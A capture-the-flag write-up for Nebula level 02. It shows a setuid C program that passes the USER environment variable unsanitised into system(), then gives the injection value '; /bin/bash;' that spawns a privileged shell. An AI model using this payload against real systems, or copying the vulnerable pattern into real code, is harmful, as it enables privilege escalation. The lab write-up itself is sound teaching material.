Nebula Challenge 02
Challenge overview: this level is arbitrary code execution again, but this time it is reached through an injection-style flaw.
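#define _GNU_SOURCE   /* needed for asprintf() and setresgid()/setresuid() */
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  char *buffer;

  gid_t gid;
  uid_t uid;

  /* the binary is setuid: make the effective IDs the real and saved IDs too */
  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  buffer = NULL;

  /* $USER is attacker-controlled and is pasted straight into a shell command line */
  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
  printf("about to call system(\"%s\")\n", buffer);

  /* system() hands the string to /bin/sh -c, so shell metacharacters are interpreted */
  system(buffer);
}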
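The program's only interaction with the outside world is the $USER variable. It can be injected into, and the injected text is then executed inside system().
Command: USER="; /bin/bash;"
" " : prevents /bin/bash from being executed as a command (by the current shell, while the variable is being assigned)
; : ends the preceding command and starts a new one
/bin/bash : forms the equivalent of system("/bin/bash")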